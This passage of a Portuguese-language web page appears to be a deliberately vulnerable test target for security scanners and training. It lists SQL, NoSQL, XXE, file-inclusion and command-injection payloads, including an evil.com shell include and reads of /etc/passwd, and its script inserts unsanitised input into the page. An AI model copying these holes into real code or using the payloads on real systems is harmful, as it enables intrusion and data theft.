                        Teste com: test'; EXEC xp_cmdshell('dir'); -- ou test'); DROP TABLE users; --
                    </div>

                    <div class="payload-examples">
                        Query simulada: EXEC GetUserData '%s'
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>4. NoSQL Injection (MongoDB)</h4>
                    <input type="text" id="nosqlParam" placeholder="Parâmetro NoSQL..." onkeyup="testNoSQL()">
                    <div class="result-box" id="nosqlResult"></div>

                    <div class="payload-examples">
                        Teste com: admin',$where:'1==1 ou {"$ne": null}
                    </div>

                    <div class="payload-examples">
                        Query simulada: db.users.find({username: '%s'})
                    </div>
                </div>

                <div class="vulnerability-section sql-section">
                    <h4>5. WAF Bypass Techniques</h4>
                    <input type="text" id="sqlWafBypass" placeholder="SQL WAF Bypass..." onkeyup="testSQLWAFBypass()">
                    <div class="result-box" id="sqlWafResult"></div>

                    <div class="payload-examples">
                        Teste com: /*!50000UNION*//*!50000SELECT*/ ou UNION(SELECT(column)FROM(table)) ou UNI%00ON SEL%00ECT
                    </div>

                    <div class="payload-examples">
                        Query simulada: SELECT * FROM products WHERE name = '%s'
                    </div>
                </div>
            </div>
        </div>
    </div>

    <!-- Outras Vulnerabilidades -->
    <div class="container">
        <h2>🛡️ Outras Vulnerabilidades Web</h2>

        <div class="grid-container">
            <!-- CSRF -->
            <div class="vulnerability-section csrf-section">
                <h3>Cross-Site Request Forgery (CSRF)</h3>

                <h4>1. Transferência Bancária</h4>
                <form id="csrfForm1" action="/transfer" method="POST">
                    <input type="text" name="to_account" placeholder="Conta destino..." required>
                    <input type="number" name="amount" placeholder="Valor..." required>
                    <button type="submit">💰 Transferir</button>
                </form>

                <h4>2. Mudança de Senha</h4>
                <form id="csrfForm2" action="/change_password" method="POST">
                    <input type="password" name="new_password" placeholder="Nova senha..." required>
                    <button type="submit">🔑 Alterar Senha</button>
                </form>

                <h4>3. Exclusão de Conta</h4>
                <form id="csrfForm3" action="/delete_account" method="POST">
                    <input type="checkbox" id="confirmDelete" required> Confirmo a exclusão
                    <button type="submit">🗑️ Excluir Conta</button>
                </form>
            </div>

            <!-- LFI/RFI -->
            <div class="vulnerability-section lfi-section">
                <h3>Local/Remote File Inclusion</h3>

                <h4>1. Include de Página</h4>
                <input type="text" id="includePage" placeholder="Página a incluir..." onkeyup="simulateInclude()">
                <div class="result-box" id="includeResult"></div>

                <div class="payload-examples">
                    Teste com: ../../../../etc/passwd ou ../../../windows/system32/drivers/etc/hosts
                </div>

                <h4>2. Template Loading</h4>
                <select id="templateSelect" onchange="loadTemplate()">
                    <option value="">Selecione um template</option>
                    <option value="header.php">header.php</option>
                    <option value="footer.php">footer.php</option>
                    <option value="sidebar.php">sidebar.php</option>
                </select>
                <input type="text" id="customTemplate" placeholder="Template customizado..." onkeyup="loadTemplate()">
                <div class="result-box" id="templateResult"></div>

                <h4>3. File Download</h4>
                <input type="text" id="downloadFile" placeholder="Arquivo para download..." onkeyup="simulateDownload()">
                <div class="result-box" id="downloadResult"></div>

                <div class="payload-examples">
                    Teste com: http://evil.com/shell.php ou file:///etc/passwd
                </div>
            </div>

            <!-- RCE -->
            <div class="vulnerability-section rce-section">
                <h3>Remote Code Execution</h3>

                <h4>1. System Command</h4>
                <input type="text" id="systemCmd" placeholder="Comando do sistema..." onkeyup="simulateSystemCmd()">
                <div class="result-box" id="systemResult"></div>

                <div class="payload-examples">
                    Teste com: ls -la; cat /etc/passwd ou cmd.exe /c dir
                </div>

                <h4>2. Eval() PHP Simulation</h4>
                <textarea id="phpCode" placeholder="Código PHP..." onkeyup="simulatePHPEval()"></textarea>
                <div class="result-box" id="phpResult"></div>

                <div class="payload-examples">
                    Teste com: system('whoami'); ou exec('cat /etc/passwd');
                </div>

                <h4>3. Deserialization</h4>
                <textarea id="serializedData" placeholder="Dados serializados..." onkeyup="simulateDeserialization()"></textarea>
                <div class="result-box" id="deserializationResult"></div>
            </div>

            <!-- XXE -->
            <div class="vulnerability-section xxe-section">
                <h3>XML External Entity (XXE)</h3>

                <h4>1. XML Parser</h4>
                <textarea id="xmlInput" placeholder="Conteúdo XML..." onkeyup="parseXML()" rows="5"></textarea>
                <div class="result-box" id="xmlResult"></div>

                <div class="payload-examples">
                    Teste com: &lt;!DOCTYPE foo [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;&lt;root&gt;&xxe;&lt;/root&gt;
                </div>

                <h4>2. SOAP Request</h4>
                <textarea id="soapInput" placeholder="SOAP XML..." onkeyup="parseSOAP()" rows="4"></textarea>
                <div class="result-box" id="soapResult"></div>

                <h4>3. SVG Upload</h4>
                <textarea id="svgInput" placeholder="Conteúdo SVG..." onkeyup="processSVG()" rows="4"></textarea>
                <div class="result-box" id="svgResult"></div>

                <div class="payload-examples">
                    Teste com: &lt;svg xmlns="http://www.w3.org/2000/svg"&gt;&lt;!DOCTYPE svg [&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;&lt;text&gt;&xxe;&lt;/text&gt;&lt;/svg&gt;
                </div>
            </div>
        </div>
    </div>

    <!-- Log de Atividades -->
    <div class="container">
        <h2>📊 Log de Atividades de Segurança</h2>

        <div class="log-section" id="securityLog">
            <div class="log-entry log-info">
                <strong>[INFO]</strong> Sistema de simulação iniciado - <span id="startTime"></span>
            </div>
        </div>

        <button onclick="clearLog()">🧹 Limpar Log</button>
        <button onclick="exportLog()">💾 Exportar Log</button>
    </div>

    <!-- Payloads de Referência -->
    <div class="container">
        <h2>🎯 Biblioteca de Payloads</h2>

        <div class="tab-container">
            <div class="tab-buttons">
                <button class="tab-button active" onclick="showTab('payloads-xss')">XSS Payloads</button>
                <button class="tab-button" onclick="showTab('payloads-sql')">SQL Payloads</button>
                <button class="tab-button" onclick="showTab('payloads-misc')">Outros Payloads</button>
            </div>

            <div id="payloads-xss" class="tab-content active">
                <h3>XSS Payloads Completos</h3>

                <div class="payload-grid" id="xssPayloadGrid">
                    <!-- Será preenchido dinamicamente -->
                </div>
            </div>

            <div id="payloads-sql" class="tab-content">
                <h3>SQL Injection Payloads</h3>

                <div class="payload-grid" id="sqlPayloadGrid">
                    <!-- Será preenchido dinamicamente -->
                </div>
            </div>

            <div id="payloads-misc" class="tab-content">
                <h3>Payloads Diversos</h3>

                <div class="payload-grid" id="miscPayloadGrid">
                    <!-- Será preenchido dinamicamente -->
                </div>
            </div>
        </div>
    </div>

    <!-- Footer -->
    <div class="container">
        <div style="text-align: center; padding: 20px;">
            <h3>⚠️ DISCLAIMER ⚠️</h3>
            <p>Esta página contém simulações de vulnerabilidades web para fins educacionais e testes de scanners de segurança.</p>
            <p><strong>NÃO utilize em ambientes de produção!</strong></p>
            <p>Criado para testes de ferramentas de segurança e educação em cybersecurity.</p>
            <br>
            <p>Total de vulnerabilidades simuladas: <strong id="totalVulnCount">0</strong></p>
            <p>Página gerada em: <strong id="generateTime"></strong></p>
        </div>
    </div>
</div>

<script>
    // ==========================================
    // VARIÁVEIS GLOBAIS E CONFIGURAÇÕES
    // ==========================================

    let vulnerabilityStats = {
        xssAttempts: 0,
        sqlAttempts: 0,
        totalVulnerabilities: 0,
        payloadsTested: 0
    };

    let storedComments = [];
    let guestbookEntries = [];
    let reviewEntries = [];
    let forumPosts = [];
    let newsArticles = [];
    let securityLogEntries = [];
    let secondOrderData = [];

    // Relógio em tempo real
    function updateClock() {
        const now = new Date();
        const timeString = now.toLocaleTimeString('pt-BR');
        document.getElementById('clock').textContent = timeString;
    }

    // ==========================================
    // SISTEMA DE TABS
    // ==========================================

    function showTab(tabId) {
        // Esconder todas as abas
        const tabContents = document.querySelectorAll('.tab-content');
        tabContents.forEach(tab => {
            tab.classList.remove('active');
        });

        // Remover classe active de todos os botões
        const tabButtons = document.querySelectorAll('.tab-button');
        tabButtons.forEach(button => {
            button.classList.remove('active');
        });

        // Mostrar aba selecionada
        const selectedTab = document.getElementById(tabId);
        if (selectedTab) {
            selectedTab.classList.add('active');
        }

        // Ativar botão correspondente
        const activeButton = document.querySelector(`[onclick="showTab('${tabId}')"]`);
        if (activeButton) {
            activeButton.classList.add('active');
        }
    }

    // ==========================================
    // FUNÇÕES DE XSS REFLETIDO
    // ==========================================

    function reflectedXSS1() {
        const input = document.getElementById('search1').value;
        const result = document.getElementById('result1');

        // Simulação vulnerável - inserção direta
        result.innerHTML = `<p>Resultados para: ${input}</p>`;

        logSecurityEvent('XSS', `XSS Refletido 1 - Input: ${input}`);
        updateStats('xss');
    }

    function reflectedXSS2() {
        const input = document.getElementById('search2').value;
        const result = document.getElementById('result2');

        // Simulação vulnerável com innerHTML
        result.innerHTML = `<div class="search-result">Busca avançada: ${input}</div>`;

        logSecurityEvent('XSS', `XSS Refletido 2 - Input: ${input}`);
        updateStats('xss');
    }

    function reflectedXSS3() {
        const input = document.getElementById('search3').value;
        const result = document.getElementById('result3');

        // Simulação de parâmetro GET
        result.innerHTML = `<p>Query string processada: ?search=${input}</p>`;

        logSecurityEvent('XSS', `XSS Refletido 3 - Query: ${input}`);
        updateStats('xss');
    }

    function reflectedXSS4() {
        const input = document.getElementById('search4').value;
        const result = document.getElementById('result4');

        // Simulação de header reflection
        result.innerHTML = `<p>User-Agent detectado: ${input}</p>`;

        logSecurityEvent('XSS', `XSS Refletido 4 - Header: ${input}`);
        updateStats('xss');
    }

    function reflectedXSS5() {
        const name = document.getElementById('search5a').value;
        const email = document.getElementById('search5b').value;
        const comment = document.getElementById('search5c').value;
        const result = document.getElementById('result5');

        // Múltiplos contextos vulneráveis
        result.innerHTML = `
            <p>Nome: ${name}</p>
            <p>Email: ${email}</p>
            <p>Comentário: ${comment}</p>
        `;

        logSecurityEvent('XSS', `XSS Refletido 5 - Múltiplos contextos`);
        updateStats('xss');
    }

    // ==========================================
    // FUNÇÕES DE XSS ARMAZENADO
    // ==========================================

    function addStoredComment(containerId, inputId, authorId) {
        const content = document.getElementById(inputId).value;
        const author = document.getElementById(authorId).value || 'Anônimo';

        if (content.trim() === '') return;

        const comment = {
            id: Date.now(),
            content: content,
            author: author,
            timestamp: new Date().toLocaleString()
        };

        storedComments.push(comment);
        document.getElementById(inputId).value = '';
        document.getElementById(authorId).value = '';

        renderStoredComments(containerId);
        logSecurityEvent('XSS', `XSS Armazenado - Comentário: ${content.substring(0, 50)}...`);
        updateStats('xss');
    }

    function renderStoredComments(containerId) {
        const container = document.getElementById(containerId);
        container.innerHTML = '';

        storedComments.forEach(comment => {
            const div = document.createElement('div');
            div.style.cssText = 'border: 1px solid #ccc; padding: 10px; margin: 5px 0; border-radius: 5px; background: rgba(255,255,255,0.1);';

            // VULNERABILIDADE: innerHTML sem sanitização
            div.innerHTML = `
                <small><strong>${comment.author}</strong> - ${comment.timestamp}</small><br>
                ${comment.content}
            `;

            container.appendChild(div);
        });
    }

    function addGuestbookEntry() {
        const message = document.getElementById('guestbook').value;
        const name = document.getElementById('guestName').value || 'Visitante';
        const email = document.getElementById('guestEmail').value || 'não informado';

        if (message.trim() === '') return;

        const entry = {
            id: Date.now(),
            message: message,
            name: name,
            email: email,
            timestamp: new Date().toLocaleString()
        };

        guestbookEntries.push(entry);
        document.getElementById('guestbook').value = '';
        document.getElementById('guestName').value = '';
        document.getElementById('guestEmail').value = '';

        renderGuestbook();
        logSecurityEvent('XSS', `Guestbook Entry - Nome: ${name}`);
        updateStats('xss');
    }

    function renderGuestbook() {
        const container = document.getElementById('guestbookEntries');
        container.innerHTML = '';

        guestbookEntries.forEach(entry => {
            const div = document.createElement('div');
            div.style.cssText = 'border: 1px solid #ccc; padding: 12px; margin: 8px 0; border-radius: 8px; background: rgba(255,255,255,0.1);';

            // VULNERABILIDADE: Múltiplos pontos de injeção
            div.innerHTML = `
                <div style="font-weight: bold; color: #ffd93d;">${entry.name} &lt;${entry.email}&gt;</div>
                <div style="font-size: 0.9em; opacity: 0.8;">${entry.timestamp}</div>
                <div style="margin-top: 8px;">${entry.message}</div>
            `;

            container.appendChild(div);
        });
    }

    function addReview() {
        const rating = document.getElementById('rating').value;
        const review = document.getElementById('review').value;

        if (review.trim() === '') return;

        const entry = {
            id: Date.now(),
            rating: rating,
            review: review,
            timestamp: new Date().toLocaleString()
        };

        reviewEntries.push(entry);
        document.getElementById('review').value = '';

        renderReviews();
        logSecurityEvent('XSS', `Review adicionado - Rating: ${rating}`);
        updateStats('xss');
    }

    function renderReviews() {
        const container = document.getElementById('reviews');
        container.innerHTML = '';

        reviewEntries.forEach(entry => {
            const div = document.createElement('div');
            div.style.cssText = 'border: 1px solid #ccc; padding: 10px; margin: 5px 0; border-radius: 5px; background: rgba(255,255,255,0.1);';

            const stars = '⭐'.repeat(parseInt(entry.rating));

            // VULNERABILIDADE: Review content não sanitizado
            div.innerHTML = `
                <div>${stars} (${entry.rating}/5)</div>
                <div style="font-size: 0.9em; opacity: 0.8;">${entry.timestamp}</div>
                <div style="margin-top: 5px;">${entry.review}</div>
            `;

            container.appendChild(div);
        });
    }

    function addForumPost() {
        const title = document.getElementById('forumTitle').value;
        const content = document.getElementById('forumContent').value;
        const author = document.getElementById('forumAuthor').value || 'Anônimo';

        if (title.trim() === '' || content.trim() === '') return;

        const post = {
            id: Date.now(),
            title: title,
            content: content,
            author: author,
            timestamp: new Date().toLocaleString(),
            replies: 0
        };

        forumPosts.push(post);
        document.getElementById('forumTitle').value = '';
        document.getElementById('forumContent').value = '';
        document.getElementById('forumAuthor').value = '';

        renderForumPosts();
        logSecurityEvent('XSS', `Forum post - Título: ${title.substring(0, 30)}...`);
        updateStats('xss');
    }

    function renderForumPosts() {
        const container = document.getElementById('forumPosts');
        container.innerHTML = '';

        forumPosts.forEach(post => {
            const div = document.createElement('div');
            div.style.cssText = 'border: 1px solid #ccc; padding: 15px; margin: 10px 0; border-radius: 8px; background: rgba(255,255,255,0.1);';

            // VULNERABILIDADE: Título e conteúdo sem sanitização
            div.innerHTML = `
                <h4 style="color: #ffd93d; margin-bottom: 8px;">${post.title}</h4>
                <div style="font-size: 0.9em; opacity: 0.8; margin-bottom: 10px;">
                    Por <strong>${post.author}</strong> em ${post.timestamp} | ${post.replies} respostas
                </div>
                <div>${post.content}</div>
            `;

            container.appendChild(div);
        });
    }

    function addNewsArticle() {
        const title = document.getElementById('newsTitle').value;
        const content = document.getElementById('newsContent').value;
        const author = document.getElementById('newsAuthor').value || 'Redação';
        const category = document.getElementById('newsCategory').value || 'Geral';

        if (title.trim() === '' || content.trim() === '') return;

        const article = {
            id: Date.now(),
            title: title,
            content: content,
            author: author,
            category: category,
            timestamp: new Date().toLocaleString(),
            views: Math.floor(Math.random() * 1000)
        };

        newsArticles.push(article);
        document.getElementById('newsTitle').value = '';
        document.getElementById('newsContent').value = '';
        document.getElementById('newsAuthor').value = '';
        document.getElementById('newsCategory').value = '';

        renderNewsArticles();
        logSecurityEvent('XSS', `Notícia publicada - Título: ${title.substring(0, 30)}...`);
        updateStats('xss');
    }

    function renderNewsArticles() {
        const container = document.getElementById('newsArticles');
        container.innerHTML = '';

        newsArticles.forEach(article => {
            const div = document.createElement('div');
            div.style.cssText = 'border: 1px solid #ccc; padding: 15px; margin: 10px 0; border-radius: 8px; background: rgba(255,255,255,0.1);';

            // VULNERABILIDADE: Múltiplos campos sem sanitização
            div.innerHTML = `
                <div style="background: rgba(255,107,107,0.2); padding: 5px 10px; border-radius: 15px; display: inline-block; font-size: 0.8em; margin-bottom: 8px;">
                    ${article.category}
                </div>
                <h3 style="color: #ffd93d; margin-bottom: 8px;">${article.title}</h3>
                <div style="font-size: 0.9em; opacity: 0.8; margin-bottom: 10px;">
                    Por <strong>${article.author}</strong> | ${article.timestamp} | ${article.views} visualizações
                </div>
                <div style="line-height: 1.6;">${article.content}</div>
            `;

            container.appendChild(div);
        });
    }

    // ==========================================
    // FUNÇÕES DE XSS DOM-BASED
    // ==========================================

    function updateHash() {
        const input = document.getElementById('hashInput').value;

        // Atualizar hash da URL (simulação)
        window.location.hash = input;

        // Leitura vulnerável do hash
        readHashValue();

        logSecurityEvent('XSS', `DOM XSS - Hash alterado: ${input}`);
        updateStats('xss');
    }

    function readHashValue() {
        const hashValue = window.location.hash.substring(1);
        const result = document.getElementById('hashResult');

        // VULNERABILIDADE: Inserção direta do hash
        result.innerHTML = `<p>Hash atual: ${hashValue}</p>`;
    }

    function vulnerableWrite() {
        const input = document.getElementById('writeInput').value;
        const result = document.getElementById('writeResult');

        // VULNERABILIDADE: document.write simulado
        result.innerHTML = `<p>document.write() executado: ${input}</p>`;

        logSecurityEvent('XSS', `DOM XSS - document.write: ${input.substring(0, 50)}...`);
        updateStats('xss');
    }

    function vulnerableEval() {
        const input = document.getElementById('evalInput').value;
        const result = document.getElementById('evalResult');

        // VULNERABILIDADE: eval() simulado (não executamos realmente)
        result.innerHTML = `<p>eval() simulado com: ${input}</p>`;

        // Log do que seria executado
        console.log('EVAL simulado:', input);

        logSecurityEvent('XSS', `DOM XSS - eval() simulado: ${input}`);
        updateStats('xss');
    }

    function vulnerableTimeout() {
        const input = document.getElementById('timeoutInput').value;
        const result = document.getElementById('timeoutResult');

        // VULNERABILIDADE: setTimeout com código dinâmico (simulação)
        result.innerHTML = `<p>setTimeout() agendado com: ${input}</p>`;

        logSecurityEvent('XSS', `DOM XSS - setTimeout: ${input}`);
        updateStats('xss');
    }

    function manipulateDOM() {
        const input = document.getElementById('domInput').value;
        const property = document.getElementById('domProperty').value;
        const result = document.getElementById('domResult');

        // VULNERABILIDADE: Propriedades DOM manipuladas dinamicamente
        switch(property) {
            case 'innerHTML':
                result.innerHTML = input;
                break;
            case 'outerHTML':
                result.innerHTML = `<p>outerHTML definido como: ${input}</p>`;
                break;
            case 'textContent':
                result.textContent = input;
                break;
            case 'innerText':
                result.innerText = input;
                break;
        }

        logSecurityEvent('XSS', `DOM XSS - ${property}: ${input.substring(0, 50)}...`);
        updateStats('xss');
    }

    // ==========================================
    // FUNÇÕES DE XSS EM ATRIBUTOS
    // ==========================================

    function updateImageSrc() {
        const src = document.getElementById('imgSrc').value;
        const img = document.getElementById('dynamicImg');

        // VULNERABILIDADE: Atributo src sem validação
        img.src = src;
        img.title = src;

        logSecurityEvent('XSS', `XSS Atributo - img src: ${src}`);
        updateStats('xss');
    }

    function updateLinkHref() {
        const href = document.getElementById('linkHref').value;
        const link = document.getElementById('dynamicLink');

        // VULNERABILIDADE: href sem validação
        link.href = href;
        link.textContent = `🔗 ${href}`;

        logSecurityEvent('XSS', `XSS Atributo - link href: ${href}`);
        updateStats('xss');
    }

    function updateFormAction() {
        const action = document.getElementById('formAction').value;
        const form = document.getElementById('dynamicForm');

        // VULNERABILIDADE: action sem validação
        if (action) {
            form.action = action;
        }

        logSecurityEvent('XSS', `XSS Atributo - form action: ${action}`);
        updateStats('xss');
    }

    function updateFormMethod() {
        const method = document.getElementById('formMethod').value;
        const form = document.getElementById('dynamicForm');

        // VULNERABILIDADE: method sem validação
        if (method) {
            form.method = method;
        }

        logSecurityEvent('XSS', `XSS Atributo - form method: ${method}`);
        updateStats('xss');
    }

    function updateStyle() {
        const style = document.getElementById('styleInput').value;
        const element = document.getElementById('styledElement');

        // VULNERABILIDADE: style sem sanitização
        element.setAttribute('style', element.getAttribute('style') + '; ' + style);

        logSecurityEvent('XSS', `XSS Atributo - style: ${style}`);
        updateStats('xss');
    }

    function updateMultipleAttrs() {
        const title = document.getElementById('attrTitle').value;
        const alt = document.getElementById('attrAlt').value;
        const cssClass = document.getElementById('attrClass').value;
        const element = document.getElementById('multiAttrElement');

        // VULNERABILIDADE: Múltiplos atributos sem validação
        if (title) element.title = title;
        if (alt) element.setAttribute('alt', alt);
        if (cssClass) element.className = cssClass;

        logSecurityEvent('XSS', `XSS Múltiplos Atributos - title: ${title}, alt: ${alt}, class: ${cssClass}`);
        updateStats('xss');
    }

    // ==========================================
    // FUNÇÕES DE XSS AVANÇADO
    // ==========================================

    function testBypass() {
        const input = document.getElementById('bypassInput').value;
        const result = document.getElementById('bypassResult');

        // Simulação de bypass de filtros
        result.innerHTML = `<p>Teste de bypass processado: ${input}</p>`;

        logSecurityEvent('XSS', `XSS Bypass - Input: ${input}`);
        updateStats('xss');
    }

    function testEncoded() {
        const input = document.getElementById('encodedInput').value;
        const result = document.getElementById('encodedResult');

        // Simulação de processamento de encoding
        result.innerHTML = `<p>Payload encodado processado: ${input}</p>`;

        logSecurityEvent('XSS', `XSS Encoded - Input: ${input}`);
        updateStats('xss');
    }

    function testEventHandlers() {
        const input = document.getElementById('eventInput').value;
        const result = document.getElementById('eventResult');

        // Simulação de event handlers
        result.innerHTML = `<p>Event handler testado: ${input}</p>`;

        logSecurityEvent('XSS', `XSS Event Handler - Input: ${input}`);
        updateStats('xss');
    }

    function testPolyglot() {
        const input = document.getElementById('polyglotInput').value;
        const result = document.getElementById('polyglotResult');

        // Simulação de polyglot XSS
        result.innerHTML = `<p>Polyglot XSS testado: ${input}</p>`;

        logSecurityEvent('XSS', `XSS Polyglot - Input: ${input}`);
        updateStats('xss');
    }

    function testWAFBypass() {
        const input = document.getElementById('wafBypassInput').value;
        const result = document.getElementById('wafBypassResult');

        // Simulação de WAF bypass
        result.innerHTML = `<p>WAF Bypass testado: ${input}</p>`;

        logSecurityEvent('XSS', `XSS WAF Bypass - Input: ${input}`);
        updateStats('xss');
    }

    // ==========================================
    // FUNÇÕES DE SQL INJECTION BÁSICO
    // ==========================================

    function simulateLogin() {
        const username = document.getElementById('sqlUser').value;
        const password = document.getElementById('sqlPass').value;
        const result = document.getElementById('loginResult');

        // Simulação de query vulnerável
        const query = `SELECT * FROM users WHERE username='${username}' AND password='${password}'`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Resultado:</strong> ${checkSQLPayload(username + password) ? 'Login bem-sucedido (BYPASS!)' : 'Credenciais verificadas'}</p>
        `;

        logSecurityEvent('SQL', `Login attempt - User: ${username}`);
        updateStats('sql');
    }

    function searchProduct() {
        const search = document.getElementById('productSearch').value;
        const result = document.getElementById('productResult');

        // Simulação de busca vulnerável
        const query = `SELECT name, price FROM products WHERE name LIKE '%${search}%'`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Produtos encontrados:</strong> ${generateFakeProducts(search)}</p>
        `;

        logSecurityEvent('SQL', `Product search - Query: ${search}`);
        updateStats('sql');
    }

    function searchById() {
        const id = document.getElementById('idSearch').value;
        const result = document.getElementById('idResult');

        // Simulação de busca por ID vulnerável
        const query = `SELECT * FROM records WHERE id = ${id}`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Registro:</strong> ${generateFakeRecord(id)}</p>
        `;

        logSecurityEvent('SQL', `ID search - ID: ${id}`);
        updateStats('sql');
    }

    function filterByCategory() {
        const category = document.getElementById('categoryFilter').value || document.getElementById('customCategory').value;
        const result = document.getElementById('categoryResult');

        if (!category) return;

        // Simulação de filtro vulnerável
        const query = `SELECT * FROM products WHERE category = '${category}'`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Categoria:</strong> ${category}</p>
            <p><strong>Produtos:</strong> ${Math.floor(Math.random() * 50)} encontrados</p>
        `;

        logSecurityEvent('SQL', `Category filter - Category: ${category}`);
        updateStats('sql');
    }

    function dynamicOrder() {
        const orderBy = document.getElementById('orderBy').value;
        const direction = document.getElementById('orderDirection').value;
        const result = document.getElementById('orderResult');

        if (!orderBy) return;

        // Simulação de ORDER BY vulnerável
        const query = `SELECT * FROM products ORDER BY ${orderBy} ${direction}`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Ordenação:</strong> ${orderBy} ${direction}</p>
        `;

        logSecurityEvent('SQL', `Dynamic order - Field: ${orderBy}, Direction: ${direction}`);
        updateStats('sql');
    }

    // ==========================================
    // FUNÇÕES DE UNION SQL INJECTION
    // ==========================================

    function testUnionColumns() {
        const input = document.getElementById('unionCols').value;
        const result = document.getElementById('unionColsResult');

        const query = `SELECT name, price, description FROM products WHERE id = '${input}'`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Resultado:</strong> ${analyzeUnionPayload(input)}</p>
        `;

        logSecurityEvent('SQL', `UNION columns test - Input: ${input}`);
        updateStats('sql');
    }

    function extractData() {
        const input = document.getElementById('unionData').value;
        const result = document.getElementById('unionDataResult');

        const query = `SELECT name, price, description FROM products WHERE id = '${input}'`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Dados extraídos:</strong> ${simulateDataExtraction(input)}</p>
        `;

        logSecurityEvent('SQL', `UNION data extraction - Input: ${input}`);
        updateStats('sql');
    }

    function listTables() {
        const input = document.getElementById('unionTables').value;
        const result = document.getElementById('unionTablesResult');

        const query = `SELECT * FROM articles WHERE title LIKE '%${input}%'`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Tabelas encontradas:</strong> ${simulateTableList(input)}</p>
        `;

        logSecurityEvent('SQL', `UNION table listing - Input: ${input}`);
        updateStats('sql');
    }

    function listColumns() {
        const input = document.getElementById('unionColumns').value;
        const result = document.getElementById('unionColumnsResult');

        const query = `SELECT * FROM articles WHERE title LIKE '%${input}%'`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Colunas encontradas:</strong> ${simulateColumnList(input)}</p>
        `;

        logSecurityEvent('SQL', `UNION column listing - Input: ${input}`);
        updateStats('sql');
    }

    function unionBypass() {
        const input = document.getElementById('unionBypass').value;
        const result = document.getElementById('unionBypassResult');

        const query = `SELECT * FROM products WHERE name = '${input}'`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Bypass testado:</strong> ${analyzeBypassTechnique(input)}</p>
        `;

        logSecurityEvent('SQL', `UNION bypass - Input: ${input}`);
        updateStats('sql');
    }

    // ==========================================
    // FUNÇÕES DE BLIND SQL INJECTION
    // ==========================================

    function testBooleanBlind() {
        const input = document.getElementById('booleanBlind').value;
        const result = document.getElementById('booleanResult');

        const query = `SELECT * FROM users WHERE id = '${input}' AND active = 1`;

        const isTrue = input.includes('1=1') || input.includes('true') || Math.random() > 0.5;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Resultado:</strong> ${isTrue ? 'Verdadeiro (dados retornados)' : 'Falso (nenhum dado)'}</p>
            <p><strong>Status HTTP:</strong> ${isTrue ? '200 OK' : '404 Not Found'}</p>
        `;

        logSecurityEvent('SQL', `Boolean blind - Input: ${input}, Result: ${isTrue}`);
        updateStats('sql');
    }

    function testErrorBlind() {
        const input = document.getElementById('errorBlind').value;
        const result = document.getElementById('errorResult');

        const query = `SELECT * FROM users WHERE id = '${input}'`;

        const hasError = input.includes('EXTRACTVALUE') || input.includes('UPDATEXML') || input.includes('COUNT(*)');

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Erro forçado:</strong> ${hasError ? 'XPATH syntax error' : 'Query executada normalmente'}</p>
            <p><strong>Dados vazados:</strong> ${hasError ? simulateErrorLeakage() : 'Nenhum'}</p>
        `;

        logSecurityEvent('SQL', `Error-based blind - Input: ${input}`);
        updateStats('sql');
    }

    function extractCharByChar() {
        const input = document.getElementById('charExtract').value;
        const result = document.getElementById('charResult');

        const query = `SELECT id FROM products WHERE category = '${input}'`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Extração character-by-character:</strong> ${simulateCharExtraction(input)}</p>
        `;

        logSecurityEvent('SQL', `Char-by-char extraction - Input: ${input}`);
        updateStats('sql');
    }

    function testBlindSubquery() {
        const input = document.getElementById('blindSubquery').value;
        const result = document.getElementById('subqueryResult');

        const query = `SELECT * FROM products WHERE id = '${input}'`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Subconsulta:</strong> ${analyzeSubquery(input)}</p>
        `;

        logSecurityEvent('SQL', `Blind subquery - Input: ${input}`);
        updateStats('sql');
    }

    function testBlindRegex() {
        const input = document.getElementById('blindRegex').value;
        const result = document.getElementById('regexResult');

        const query = `SELECT * FROM users WHERE username = '${input}'`;

        result.innerHTML = `
            <p><strong>Query executada:</strong></p>
            <code>${query}</code>
            <p><strong>Regex match:</strong> ${simulateRegexMatch(input)}</p>
        `;

        logSecurityEvent('SQL', `Blind regex - Input: ${input}`);
        update